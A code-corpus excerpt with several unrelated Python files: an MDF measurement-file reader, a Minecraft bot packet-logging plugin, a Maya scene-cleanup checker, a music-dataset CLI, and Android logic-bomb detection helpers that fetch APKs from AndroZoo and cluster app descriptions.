os,scipy, shutil\r\nimport numpy as np\r\n\r\n\r\nimport mdfreader\r\n\r\n\r\n# 将数据加载到内存中\r\nDataFile = mdfreader.mdf()\r\nDataFile.read(fileName=File_Path, channelList=signal_list)\r\n# 由于加载信号时可能会没法加载时间通道以至于无法进行resample,所以需要额外再加载一次以补上时间通道\r\ntimeline_list = []\r\nfor i in range(len(signal_list)):\r\n timeline_list.append(DataFile.getChannelMaster(signal_list[i]))\r\nDataFile.read(fileName=file_path, channelList=timeline_list)\r\n'''\r\n# 针对过去遇到的一些读取信号数值时遇到的乱码问题,现在读取时没有这个问题\r\nfor n in range(len(special_signal_list)):\r\n key_list=[]\r\n value_list_of_key=[]\r\n for key,value in DataFile.masterChannelList.items():\r\n key_list.append(key)\r\n value_list_of_key.append(value)\r\n for i in range(len(value_list_of_key)):\r\n if special_signal_list[n] in value_list_of_key[i]:\r\n #get_value_index = value_list_of_key[i].index(Special_Signal_List[n])\r\n vars()[special_signal_list[n] + '_value'] = np.where(DataFile.getChannelData(special_signal_list[n]) == 'FALSE', 0, 1)\r\n #print(vars()[Special_Signal_List[n] + '_value'])\r\n DataFile.remove_channel(special_signal_list[n])\r\n #print(DataFile.masterChannelList)\r\n DataFile.add_channel(dataGroup=key_list[i], channel_name=special_signal_list[n], data=vars()[special_signal_list[n] + '_value'], master_channel=key_list[i], )\r\n #print(DataFile.masterChannelList)\r\nprint(DataFile.getChannelData(kl15_name).max())\r\n'''\r\n# resample,如果不填写数字或者信号则默认以采样频率最高者为基准\r\nDataFile.resample(0.01)\r\n# 获取信号数值,为numpy格式\r\nengine_speed_name = 'nmot_w'\r\nengine_speed_value = DataFile.getChannelData(engine_speed_name)\r\n# 获取信号所在组的组名\r\nengine_speed_group = DataFile.getChannelMaster(engine_speed_name)\r\n# 移除、添加、修改信号\r\nDataFile.remove_channel(engine_speed_name)\r\nDataFile.add_channel(dataGroup=engine_speed_group, channel_name=engine_speed_name, data=engine_speed_value, master_channel=engine_speed_group)\r\nDataFile.setChannelData(engine_speed_name, engine_speed_value, compression=False)\r\n\r\n\r\n\r\n# 修复里程信号(有时数值会变为0)\r\nif mileage_name in DataFile.keys():\r\n mileage_channel_master = DataFile.getChannelMaster(mileage_name)\r\n mileage_value_temp = DataFile.getChannelData(mileage_name)\r\n for i in range(len(mileage_value_temp) - 1, -2, -1):\r\n if mileage_value_temp[i] == 0:\r\n mileage_value_temp[i] = mileage_value_temp[i + 1]\r\n DataFile.remove_channel(mileage_name)\r\n DataFile.add_channel(dataGroup=mileage_channel_master, channel_name=mileage_name, data=mileage_value_temp, master_channel=mileage_channel_master)\r\n\r\nprint(DataFile.masterChannelList) # resample前的信号列表\r\n#print(DataFile.MDFVersionNumber) # MDF版本\r\n# 对信号进行resample,默认以采样频率最高的信号为基准\r\nprint('file loaded, start resampling')\r\n#DataFile.resample(masterChannel=DataFile.getChannelMaster(engine_speed_name))\r\nDataFile.resample(0.01)\r\n#DataFile.resample()\r\nprint(DataFile.masterChannelList) # resample后的信号列表\r\n# resample后的时间通道\r\n#t_new = 'master'\r\n\r\n# 把resample后的数据赋值给变量(并进行拼接)\r\nt_new = DataFile.getChannelMaster(engine_speed_name)\r\ntime_value_temp = DataFile.getChannelData(t_new)\r\n#print(time_value_temp)\r\nif i_file > 0:\r\n time_value_temp += time_value.max()\r\ntime_value = np.append(time_value, time_value_temp )\r\nfor i in range(len(signal_list)):\r\n if signal_list[i] in DataFile.keys():\r\n vars()[signal_name_list[i] + '_value'] = np.append(vars()[signal_name_list[i] + '_value'], DataFile.getChannelData(signal_list[i]))\r\n else:\r\n print(signal_list[i] + ' not found')\r\n #nofound_signal_list.append(signal_list[i])\r\n #vars()[signal_name_list[i] + '_value'] = np.append(vars()[signal_name_list[i] + '_value'], np.zeros(len(time_value), dtype=np.int))\r\n\r\n\r\n# ----------------------------------------------------------------------------------\r\n# 将一个物理量可能的信号名称都存放在Excel中,然后程序依次判断应该根据哪个信号名来读取数据\r\n# ----------------------------------------------------------------------------------\r\n# -------------------------------------------------------\r\n# 设置要加载的信号列表\r\n# -------------------------------------------------------\r\nself.wbk_signal = openpyxl.load_workbook('Signal List.xlsx')\r\nself.sht_signal = self.wbk_signal.worksheets[0]\r\n# 表单1,用于大图\r\nself.signal_name_list_1 = [\r\n 'speed',\r\n 'engine speed',\r\n 'pedal',\r\n 'water temp',\r\n 'Lamb Precat',\r\n 'Lamb Postcat'\r\n]\r\nself.speed_list = self.get_signal_list(2)\r\nself.engine_speed_list = self.get_signal_list(3)\r\nself.pedal_list = self.get_signal_list(4)\r\nself.water_temp_list = self.get_signal_list(5)\r\nself.lamb_precat_list = self.get_signal_list(6)\r\nself.lamb_postcat_list = self.get_signal_list(7)\r\n\r\n\r\ndef get_signal_list(self, x):\r\n y = 2\r\n signal = []\r\n while self.sht_signal.cell(row=x, column=y).value != None:\r\n signal.append(self.sht_signal.cell(row=x, column=y).value)\r\n y += 1\r\n return signal\r\n\r\n\r\ndef get_signal_name(self, list, names):\r\n for name in names:\r\n if name in list:\r\n return name\r\n \r\nself.data_file = mdfreader.mdf()\r\n# 先读取文件内所有信号\r\nself.data_file.read(fileName=self.file_path)\r\nchannel_list = self.data_file.keys()\r\n# 根据文件内信号和之前读取的信号列表来确定各个物理量的信号名称\r\n# 1\r\nself.speed_name = self.get_signal_name(channel_list, self.speed_list)\r\nself.engine_speed_name = self.get_signal_name(channel_list, self.engine_speed_list)\r\nself.pedal_name = self.get_signal_name(channel_list, self.pedal_list)\r\nself.water_temp_name = self.get_signal_name(channel_list, self.water_temp_list)\r\nself.lamb_precat_name = self.get_signal_name(channel_list, self.lamb_precat_list)\r\nself.lamb_postcat_name = self.get_signal_name(channel_list, self.lamb_postcat_list)\r\nself.signal_list_1 = [\r\n self.speed_name,\r\n self.engine_speed_name,\r\n self.pedal_name,\r\n self.water_temp_name,\r\n self.lamb_precat_name,\r\n self.lamb_postcat_name,\r\n]\r\nself.data_file = mdfreader.mdf()\r\nself.data_file.read(fileName=self.file_path, channelList=self.signal_list)\r\n# 由于一个插件bug导致加载信号时可能会没法加载时间通道以至于无法进行resample,所以需要额外再加载一次以补上时间通道\r\ntimeline_list = [] # 需要的信号列表\r\nfor i in range(len(self.signal_list)):\r\n timeline_list.append(self.data_file.getChannelMaster(self.signal_list[\r\n i])) # Extract channel master name from mdf structure; return name string 如转速信号和对应的时间组成channel master\r\nself.data_file.read(fileName=self.file_path,\r\n channelList=timeline_list) # masterChannelList, a dict containing a list of channel names per datagroup 重新加载一次以补上时间通道,之前只通过信号名称加载可能没有时间通道\r\nprint('file loaded, start resampling')","repo_name":"TJ072175/My-Python-Code","sub_path":"读取MDF文件.py","file_name":"读取MDF文件.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28950044799","text":"\"\"\"\nA plugin that just echos every packet other than the chunk data\nand player position\n\"\"\"\n__author__ = \"Nick Gamberini, Morgan Creekmore\"\n__copyright__ = \"Copyright 2015, The SpockBot Project\"\n__license__ = \"MIT\"\n\nimport logging\n\nfrom spockbot.mcp.mcdata import hashed_structs\n\nlogger = logging.getLogger('spockbot')\n\nBLACKLIST = ['PLAYPlayer Position']\n\n\nclass EchoPacketPlugin:\n def __init__(self, ploader, settings):\n for i in list(hashed_structs.keys()):\n ploader.reg_event_handler(i, self.echopacket)\n\n def echopacket(self, name, packet):\n # Dont print Chunk Data and Map Chunk Bulk\n if packet.str_ident not in BLACKLIST:\n logger.info(str(packet))\n","repo_name":"SpockBotMC/SpockBot-Extra","sub_path":"plugins/echo_packet.py","file_name":"echo_packet.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"5140916753","text":"import os\nimport sys\nimport re\nimport glob\nimport maya.OpenMaya as api\nimport maya.cmds as cmds\nimport maya.mel as mel\nimport shutil\nimport subprocess\nfrom pprint import pprint\n\nclass mayaCmds(object):\n\n def __init__(self, parent = None):\n pass\n\n def checkNodeType(self, node):\n return cmds.nodeType(node)\n\n def selectNode(self, node):\n cmds.select(node, r=True)\n\n def getArnoldShaders(self):\n aiShaders = cmds.listNodeTypes('rendernode/arnold', ex='texture:light:shader/utility:shader/volume')\n if aiShaders is None:\n return []\n else:\n return aiShaders\n return\n\n def getAiConnectedShaders(self, shape):\n aiCShaders = []\n othCShaders = []\n multiSG = []\n aiShaders = self.getArnoldShaders()\n sgShaders = cmds.listConnections(shape, type='shadingEngine')\n if len(sgShaders) > 1:\n multiSG.append(shape)\n for sgShader in sgShaders:\n nodes = cmds.listConnections('%s.surfaceShader' % sgShader, source=True)\n if nodes:\n for node in nodes:\n if cmds.nodeType(node) in aiShaders:\n aiCShaders.append(node)\n else:\n othCShaders.append(node)\n\n return (multiSG, othCShaders, aiCShaders)\n\n def getFileNodesTexturesAssigend(self, shape):\n fileNodes = []\n texFiles = []\n udimTex = []\n ofileNodes = []\n oudimTex = []\n otexFiles = []\n otherNodes = []\n skipTex = []\n aiShaders = self.getArnoldShaders()\n sgShaders = cmds.listConnections(shape, type='shadingEngine')\n if sgShaders:\n for sgShader in sgShaders:\n nodes = cmds.listConnections('%s.surfaceShader' % sgShader, source=True)\n if nodes:\n for node in nodes:\n if cmds.nodeType(node) in aiShaders:\n try:\n cmds.setAttr('%s.shd' % shape, l=False)\n cmds.setAttr('%s.shd' % shape, '%s' % sgShader, type='string')\n cmds.setAttr('%s.shd' % shape, l=True)\n except:\n pass\n\n fileTexNodes = cmds.listConnections(node, type='file')\n bumpNodes = cmds.listConnections(node, type='bump2d')\n dispNodes = cmds.listConnections(node, type='displacementShader')\n if bumpNodes:\n otherNodes += bumpNodes\n if dispNodes:\n otherNodes += dispNodes\n if fileTexNodes:\n for fnode in fileTexNodes:\n texture = cmds.getAttr('%s.fileTextureName' % fnode)\n texture.replace('\\\\', '/')\n texture = cmds.workspace(expandName=texture)\n udimTokens = re.split('.', texture)\n if len(udimTokens) > 1:\n alltex = glob.glob('%s*%s' % (udimTokens[0], udimTokens[1]))\n for tex in alltex:\n tokens = self.getTonkenizedPath(tex)\n udimTex.append(tex)\n\n tokens = self.getTonkenizedPath(texture)\n texFiles.append(texture)\n fileNodes.append(fnode)\n\n if otherNodes:\n for onode in otherNodes:\n ofileTexNodes = cmds.listConnections(onode, type='file')\n if ofileTexNodes:\n for ofnode in ofileTexNodes:\n texture = cmds.getAttr('%s.fileTextureName' % ofnode)\n texture.replace('\\\\', '/')\n texture = cmds.workspace(expandName=texture)\n udimTokens = re.split('.', texture)\n if len(udimTokens) > 1:\n alltex = glob.glob('%s*%s' % (udimTokens[0], udimTokens[1]))\n oudimTex.extend(alltex)\n otexFiles.append(texture)\n ofileNodes.append(ofnode)\n\n return {'nodes': fileNodes,\n 'textures': texFiles,\n 'udim': udimTex,\n 'onodes': ofileNodes,\n 'otextures': otexFiles,\n 'oudim': oudimTex}\n\n def getShapesTextureFiles(self, prefix = ''):\n cmds.select(cl=True)\n try:\n cmds.select('%s_*' % prefix)\n except:\n cmds.select(all=True)\n\n shapes = cmds.ls(type='surfaceShape', sl=True, dag=True)\n if shapes is None:\n shapes = cmds.ls(type='surfaceShape')\n texDict = {}\n for shape in shapes:\n texDict[shape] = self.getFileNodesTexturesAssigend(shape)\n\n return texDict\n\n def checkTextureFiles(self):\n missingTex = {}\n files = cmds.ls(tex=True)\n for nodefile in files:\n try:\n texture = cmds.getAttr('%s.fileTextureName' % nodefile)\n texture = cmds.workspace(expandName=texture)\n texture.replace('\\\\', '/')\n udimTokens = re.split('.', texture)\n if len(udimTokens) > 1:\n alltex = glob.glob('%s*%s' % (udimTokens[0], udimTokens[1]))\n if len(alltex) == 0:\n missingTex[nodefile] = texture\n elif os.path.exists(texture) and os.path.isfile(texture):\n pass\n else:\n missingTex[nodefile] = texture\n except:\n pass\n\n return missingTex\n\n def delExtraCamLight(self):\n delList = []\n defCams = ('frontShape', 'perspShape', 'sideShape', 'topShape')\n camLigths = cmds.ls(type=['camera', 'light'])\n for cl in camLigths:\n if cmds.nodeType(cl) == 'camera' and cl not in defCams:\n cmds.delete(cl)\n delList.append(cl)\n elif cl not in defCams:\n cmds.delete(cl)\n delList.append(cl)\n\n return delList\n\n def checkUVs(self, shape):\n nodeDagPath = api.MDagPath()\n component = api.MObject()\n selList = api.MSelectionList()\n selList.add(shape)\n selList.getDagPath(0, nodeDagPath, component)\n mfnMesh = api.MFnMesh(nodeDagPath)\n itPoly = api.MItMeshPolygon(nodeDagPath, component)\n uvprob = False\n uvnegative = False\n noUVs = []\n negUVs = []\n itPoly.reset(nodeDagPath, component)\n while not itPoly.isDone():\n index = itPoly.index()\n uArray = api.MFloatArray()\n vArray = api.MFloatArray()\n if not itPoly.hasUVs():\n noUVs.append(index)\n uvprob = True\n else:\n itPoly.getUVs(uArray, vArray)\n for i in range(uArray.length()):\n if uArray[i] < -0.001 or vArray[i] < -0.001:\n negUVs.append(index)\n uvnegative = True\n break\n\n itPoly.next()\n\n return (noUVs, negUVs)\n\n def checkRemoveRefs(self):\n curScene = cmds.file(q=True, sceneName=True)\n refs = cmds.file(curScene, q=True, reference=True)\n for ref in refs:\n cmds.file(ref, removeReference=True)\n\n return refs\n\n def deleteLayers(self):\n layers = cmds.ls(type=['displayLayer', 'renderLayer'])\n for layer in layers:\n if layer not in ('defaultRenderLayer', 'defaultLayer'):\n cmds.delete(layer)\n\n def deleteNonStaticChannel(self, node):\n attrs = cmds.listAttr(node, k=True)\n if attrs:\n for attr in attrs:\n try:\n cmds.deleteAttr(node, attribute=attr)\n except:\n pass\n\n def optimizeDefValues(self):\n optionVars = ('nurbsSrfOption', 'nurbsCrvOption', 'unusedNurbsSrfOption', 'locatorOption', 'clipOption', 'poseOption', 'ptConOption', 'pbOption', 'deformerOption', 'unusedSkinInfsOption', 'expressionOption', 'groupIDnOption', 'animationCurveOption', 'snapshotOption', 'unitConversionOption', 'shaderOption', 'cachedOption', 'transformOption', 'displayLayerOption', 'renderLayerOption', 'setsOption', 'partitionOption', 'referencedOption', 'brushOption', 'unknownNodesOption', 'shadingNetworksOption')\n cmds.optionVar(iv=('nurbsSrfOption', 1))\n cmds.optionVar(iv=('nurbsCrvOption', 0))\n cmds.optionVar(iv=('unusedNurbsSrfOption', 0))\n cmds.optionVar(iv=('locatorOption', 0))\n cmds.optionVar(iv=('clipOption', 0))\n cmds.optionVar(iv=('poseOption', 0))\n cmds.optionVar(iv=('ptConOption', 0))\n cmds.optionVar(iv=('pbOption', 1))\n cmds.optionVar(iv=('deformerOption', 0))\n cmds.optionVar(iv=('unusedSkinInfsOption', 1))\n cmds.optionVar(iv=('expressionOption', 0))\n cmds.optionVar(iv=('groupIDnOption', 1))\n cmds.optionVar(iv=('animationCurveOption', 1))\n cmds.optionVar(iv=('snapshotOption', 1))\n cmds.optionVar(iv=('unitConversionOption', 1))\n cmds.optionVar(iv=('shaderOption', 1))\n cmds.optionVar(iv=('cachedOption', 0))\n cmds.optionVar(iv=('transformOption', 1))\n cmds.optionVar(iv=('displayLayerOption', 1))\n cmds.optionVar(iv=('renderLayerOption', 1))\n cmds.optionVar(iv=('setsOption', 1))\n cmds.optionVar(iv=('partitionOption', 0))\n cmds.optionVar(iv=('referencedOption', 1))\n cmds.optionVar(iv=('brushOption', 1))\n cmds.optionVar(iv=('unknownNodesOption', 1))\n cmds.optionVar(iv=('shadingNetworksOption', 0))\n\n def setOptVariables(self, variables = []):\n for var in variables:\n cmds.optionVar(iv=(var['name'], var['value']))\n\n def sceneCheck(self, ref = False, cam = False, history = False, freezeTransf = False, nonStChannel = False, normal = False, UVs = False, aiShader = False, texture = False, polyCleanUp = False, shell = False, cleanUp = False):\n if os.name == 'nt':\n cmds.unloadPlugin('vrayformaya.mll', force=True)\n cmds.unloadPlugin('3delight_for_mayaX.mll', force=True)\n cmds.unloadPlugin('RenderMan_for_Maya.mll', force=True)\n else:\n cmds.unloadPlugin('vrayformaya.so', force=True)\n cmds.unloadPlugin('3delight_for_mayaX.so', force=True)\n cmds.unloadPlugin('RenderMan_for_Maya.so', force=True)\n objectsDict = {}\n missTex = []\n if ref:\n remRefs = self.checkRemoveRefs()\n if cam:\n delCamLights = self.delExtraCamLight()\n if texture:\n missTex = self.checkTextureFiles()\n cmds.select(cl=True)\n cmds.select(all=True)\n objs = cmds.ls(selection=True)\n for obj in objs:\n parent = cmds.listRelatives(obj, parent=True, type='transform')\n if freezeTransf:\n cmds.makeIdentity(obj, apply=True, t=1, r=1, s=1, n=0)\n if nonStChannel:\n self.deleteNonStaticChannel(obj)\n namesp = cmds.namespaceInfo(currentNamespace=True)\n if namesp != ':':\n cmds.namespace(namesp, rm=True)\n transforms = cmds.listRelatives(obj, allDescendents=True, type=['transform', 'surfaceShape'])\n if transforms is not None:\n for transf in transforms:\n multiSG = []\n cOthers = []\n cAiShaders = []\n noUVs = []\n negUVs = []\n numShells = []\n try:\n if history:\n cmds.delete(transf, ch=True)\n nodeDagPath = api.MDagPath()\n component = api.MObject()\n selList = api.MSelectionList()\n selList.add(transf)\n selList.getDagPath(0, nodeDagPath, component)\n nodeDagPath.extendToShape()\n shapeName = nodeDagPath.partialPathName()\n if aiShader:\n multiSG, cOthers, cAiShaders = self.getAiConnectedShaders(shapeName)\n if normal:\n cmds.polyNormal(shapeName, nm=2)\n cmds.delete(shapeName, ch=True)\n cmds.select(shapeName, r=True)\n if polyCleanUp:\n mel.eval('polyCleanupArgList 3 {\"0\",\"1\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"1\",\"1e-005\",\"1\",\"1e-005\",\"0\",\"1e-005\",\"0\",\"1\",\"1\"};')\n if UVs:\n noUVs, negUVs = self.checkUVs(shapeName)\n if shell:\n nshell = cmds.polyEvaluate(shapeName, shell=True)\n if nshell > 1:\n numShells.append(nshell)\n if nonStChannel:\n self.deleteNonStaticChannel(transf)\n objectsDict[shapeName] = {'name': shapeName,\n 'aiShaderAssigned': cAiShaders,\n 'shaderAssigned': cOthers,\n 'perFaceAssigned': multiSG,\n 'faceNoUvs': noUVs,\n 'faceNegUvs': negUVs,\n 'nShells': numShells}\n except Exception as msg:\n pass\n\n if cleanUp:\n self.optimizeDefValues()\n mel.eval('source \"cleanUpScene\";')\n mel.eval('cleanUp_ShouldReportProgress;')\n mel.eval('performCleanUpScene;')\n return [missTex, objectsDict]\n\n def runCheckPreset(self, preset):\n result = []\n if preset == 'Modelling sCheck':\n result = self.sceneCheck(ref=True, cam=True, history=True, freezeTransf=True, nonStChannel=True, normal=True, UVs=True, polyCleanUp=True, shell=True, cleanUp=True)\n elif preset == 'Textures sCheck':\n result = self.sceneCheck(ref=True, cam=True, history=True, nonStChannel=True, normal=True, UVs=True, aiShader=True, texture=True, cleanUp=True)\n elif preset == 'Cloth&Hair sCheck':\n result = self.sceneCheck(ref=True, cam=True, normal=True, UVs=True, aiShader=True)\n elif preset == 'Rigging sCheck':\n result = self.sceneCheck(ref=True, cam=True, aiShader=True)\n return result","repo_name":"iceanimations/fallback","sub_path":"Maya/sceneCheck_v1.0.0/modules/sCheckModules.py","file_name":"sCheckModules.py","file_ext":"py","file_size_in_byte":15088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20273506373","text":"import sys\nimport decorate_artist_list\nimport produce_test_dataset\n\n\n#Modes accepted \nMODE_SEARCH_IG_PROFILE_BY_ARTIST_NAME_MUSIC_STORY = \"MODE_SEARCH_IG_PROFILE_BY_ARTIST_NAME_MUSIC_STORY\"\nMODE_SEARCH_IG_FOLLLOWERS_BY_IG_USERNAME = \"MODE_SEARCH_IG_FOLLLOWERS_BY_IG_USERNAME\"\nMODE_SEARCH_IG_FOLLLOWERS_BY_ARTIST_NAME = \"MODE_SEARCH_IG_FOLLLOWERS_BY_ARTIST_NAME\"\nMODE_PRODUCE_TEST_DATASET_BY_PLAYLIST = \"MODE_PRODUCE_TEST_DATASET_BY_PLAYLIST\"\n\ndef main():\n message = \"\"\n arguments = sys.argv[1:]\n print(arguments)\n if len(arguments) < 2:\n message = \"mode and input file needed\"\n print(message)\n return message\n\n mode = arguments[0]\n input_filename = arguments[1]\n\n if mode == MODE_SEARCH_IG_PROFILE_BY_ARTIST_NAME_MUSIC_STORY:\n print(f\"calle funtion : {mode} with param file {input_filename}\")\n #input_filename = \"spotify_artists.csv\"\n return decorate_artist_list.decorate_music_story_artist(input_filename)\n elif mode == MODE_SEARCH_IG_FOLLLOWERS_BY_IG_USERNAME:\n print(f\"calle funtion : {mode} with param file {input_filename}\")\n #input_filename = \"music_story_enriched_artist.csv\"\n return decorate_artist_list.decorate_instagram_followers_artist_based_on_username(input_filename)\n elif mode == MODE_SEARCH_IG_FOLLLOWERS_BY_ARTIST_NAME:\n print(f\"calle funtion : {mode} with param file {input_filename}\")\n #input_filename = \"UNION MSI01-IS01-IS02 - Not Found - Duplicates Removed.csv\"\n return decorate_artist_list.decorate_instagram_followers_artist_based_on_name_search(input_filename)\n elif mode == MODE_PRODUCE_TEST_DATASET_BY_PLAYLIST:\n print(f\"calle funtion : {mode} with param file {input_filename}\")\n #spotify_playlist_id = \"2be8Q4uvGVnH3didCoySP6\"\n spotify_playlist_id = input_filename\n return produce_test_dataset.produce_test_dataset_by_spotify_playlist(spotify_playlist_id)\n else:\n message = f\"invalid mode: {mode}\"\n print(message)\n return message\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"joseph-higaki/music-hit-decorate-datasets","sub_path":".vscode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26226643188","text":"# IMPORT\nfrom nltk import pos_tag\nfrom nltk.corpus import stopwords\nfrom nltk.corpus import wordnet\nfrom nltk.stem import SnowballStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nimport nltk, re\nimport subprocess\nimport requests\nimport numpy as np\nimport os\nimport re\nimport string\nimport enchant\n\n# Difuzer++\n# \n# Copyright (C) 2023 Marco Alecci\n# University of Luxembourg - Interdisciplinary Centre for\n# Security Reliability and Trust (SnT) - TruX - All rights reserved\n# \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 2.1 of the\n# License, or (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Lesser Public License for more details.\n# \n# You should have received a copy of the GNU General Lesser Public\n# License along with this program. If not, see .\n\n################## API KEYS ########################\nfrom dotenv import load_dotenv\nimport os,sys\n# Load API KEYS from the .env file in the current directory\nCONFIG_PATH = \"./config.env\"\nif not os.path.exists(CONFIG_PATH):\n print(f\"тЪая╕П Error: File not found at path '{CONFIG_PATH}'.\\n- Make sure the config.env file exists.\\n- Ensure the CONFIG_PATH is correctly set.\")\n sys.exit(1)\nelse:\n load_dotenv(CONFIG_PATH)\nANDROZOO_API_KEY = os.getenv('ANDROZOO_API_KEY')\nOPENAI_API_KEY = os.getenv('OPENAI_API_KEY')\nANDROID_PLATFORM_PATH = os.environ.get('ANDROID_PLATFORM_PATH')\nAPK_PATH = os.environ.get('APK_PATH')\n#######################################################\n\n# extractFeatures()\n# 1) Download APK from AndroZoo\n# 2) Launch Difuzer with all details about possible logic bombs (filtering applied)\n# 3) Combine the features using predefined delimitators and return them\ndef extractFeatures(sha256):\n\n # Download apk from Androzoo\n apkUrl = \"https://androzoo.uni.lu/api/download?apikey={}&sha256={}\".format(ANDROZOO_API_KEY, sha256)\n req = requests.get(apkUrl, allow_redirects=True)\n open(APK_PATH+'{}.apk'.format(sha256), \"wb\").write(req.content)\n\n # Get the features using Difuzer\n command = 'java -jar ./Difuzer-0.1-jar-with-dependencies.jar -a {}{}.apk -p {}'.format(APK_PATH, sha256, ANDROID_PLATFORM_PATH)\n print(\"EXECUTING: {}\\n\".format(command))\n \n # Output from Difuzer\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n\n # Remove apk file\n os.remove(APK_PATH + '{}.apk'.format(sha256))\n\n # Reorganize features using predefined delimitators\n triggersFeaturesList = output.decode(\"utf-8\").split(\"@@@\\n\")[:-1]\n\n # If empty list\n if len(triggersFeaturesList) == 0:\n return np.nan\n \n for i in range(0,len(triggersFeaturesList)):\n triggersFeaturesList[i] = triggersFeaturesList[i].replace(\"\\n\",\";\")\n\n if triggersFeaturesList[0] != \"\":\n for i in range(0, len(triggersFeaturesList)):\n triggersFeaturesList[i] = triggersFeaturesList[i].split(\";\")\n triggersFeaturesList[i][3] = triggersFeaturesList[i][3].split(\"$$$\")[:-1]\n\n # Return\n if triggersFeaturesList is not np.nan:\n return triggersFeaturesList\n else:\n return np.nan\n\n# Print a trigger\ndef printTrigger(trigger):\n fv = trigger[0]\n method = trigger[1]\n condition = trigger[2]\n sources = trigger[3]\n\n print(\"\\nтЪая╕П ЁЯТг - Possible Logic Bomb\")\n print(\"FV : {}\".format(fv))\n print(\"Method : {}\".format(method))\n print(\"Condition: {}\".format(condition))\n print(\"Sources :\")\n for s in sources:\n print(\" - {}\".format(s))\n\n return\n\n# Get the fields of a trigger\ndef getTriggerMethodAndSources(trigger):\n fv = trigger[0]\n method = trigger[1]\n condition = trigger[2]\n sources = trigger[3]\n\n return method, sources\n\n# Get the ID of the topic assigned by the LDA Model\ndef getLdaID(vectorizer, ldaModel ,description):\n \n # Needed for NLP\n st = nltk.stem.snowball.EnglishStemmer()\n english_vocab = set(w.lower() for w in nltk.corpus.words.words())\n stopwords = nltk.corpus.stopwords.words('english')\n corpus = []\n\n string = description\n string = re.sub(r'\\W',' ',string)\n string = re.sub(r'\\d','',string)\n tokens = nltk.word_tokenize(string)\n words = [st.stem(w) for w in tokens if len(w)>=3 and w.lower() not in stopwords and w.lower() in english_vocab] \n descriptionProcessed = ' '.join(words) \n corpus.append(descriptionProcessed)\n\n # Retrieve the Topic ID \n tf_array = vectorizer.transform(corpus)\n doc_topic = ldaModel.transform(tf_array)\n lda_id = doc_topic[0].argmax()\n\n return lda_id\n\n# Get the ID of the cluster assigned by the KMeans Model\ndef getKmeansID(vectorizer, kmeansModel ,description):\n \n # Needed for NLP\n st = nltk.stem.snowball.EnglishStemmer()\n english_vocab = set(w.lower() for w in nltk.corpus.words.words())\n stopwords = nltk.corpus.stopwords.words('english')\n corpus = []\n\n string = description\n string = re.sub(r'\\W',' ',string)\n string = re.sub(r'\\d','',string)\n tokens = nltk.word_tokenize(string)\n words = [st.stem(w) for w in tokens if len(w)>=3 and w.lower() not in stopwords and w.lower() in english_vocab] \n descriptionProcessed = ' '.join(words) \n corpus.append(descriptionProcessed)\n\n # Retrieve the kmeans ID \n tf_array = vectorizer.transform(corpus)\n kmeans_id = kmeansModel.predict(tf_array)\n\n return int(kmeans_id)\n\nimport openai\nopenai.api_key = OPENAI_API_KEY\n\ndef getGptEmbedding(text):\n # Model to be used - (Determine the price)\n model=\"text-embedding-ada-002\"\n\n # Remove new line chars\n text = text.replace(\"\\n\", \" \")\n \n # Return Embedding\n return openai.Embedding.create(input = [text], model=model)['data'][0]['embedding']\n\n\ndef getGcataID(kmeansModel ,description):\n description = preprocessDescriptionGcata(description)\n\n embedding = getGptEmbedding(description)\n embedding = np.array(embedding).reshape(1, -1)\n\n clusterID = kmeansModel.predict(embedding)\n\n return int(clusterID)\n\n\n###################### PREPROCESSING G-CatA ################################s\n# Remove all html tags from text\ndef remove_html(text):\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)\n\n# Remove all words that are not in the US+GB dictionary\ndef remove_non_english(text):\n d_us = enchant.Dict(\"en_US\")\n d_gb = enchant.Dict(\"en_GB\")\n # build custom dict\n alt_dicts = []\n for d_file in os.listdir('./0_Data/no-filter-dict'):\n with open(os.path.join('./0_Data/no-filter-dict', d_file), 'r') as ff:\n list_terms = ff.read().lower().split()\n alt_dicts.extend(list_terms)\n new_text = ''\n for t in text.split():\n # if text is eith in US or GB english dict keep it\n if d_us.check(t) or d_gb.check(t):\n new_text = new_text + t + \" \"\n continue\n if t in alt_dicts:\n new_text = new_text + t + \" \"\n continue\n return new_text\n\n# Replace non ascii chars with spaces\ndef remove_non_ascii(text):\n printable = set(string.printable)\n return filter(lambda x: x in printable, text)\n\n# Replace punctuation chars '!\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~' with spaces\ndef remove_punctuation(text):\n return ''.join(map(lambda c: ' ' if c in string.punctuation else c, text))\n\n# Remove words with no meaning or irrelevant for searching\ndef remove_stopwords(text):\n\n return ' '.join([s for s in text.split() if s not in\n stopwords.words('english')])\n\n# Extracts the root of every word \ndef apply_stemming(text):\n stemmer = SnowballStemmer(\"english\")\n tokens = word_tokenize(text)\n stemmed_tokens = map(stemmer.stem, tokens)\n return ' '.join(stemmed_tokens)\n\n# Part of Speech Detection\ndef wordnet_pos_code(tag):\n if tag.startswith('NN'):\n return wordnet.NOUN\n elif tag.startswith('VB'):\n return wordnet.VERB\n elif tag.startswith('JJ'):\n return wordnet.ADJ\n elif tag.startswith('RB'):\n return wordnet.ADV\n else:\n return wordnet.NOUN # default value\n\n# Lemmatization\ndef apply_lemmatization(text):\n lmtzr = WordNetLemmatizer()\n tokens = word_tokenize(text)\n pos_tokens = pos_tag(tokens)\n lemm_tokens = []\n for token, pos in pos_tokens:\n w = lmtzr.lemmatize(token, wordnet_pos_code(pos))\n lemm_tokens.append(w)\n return ' 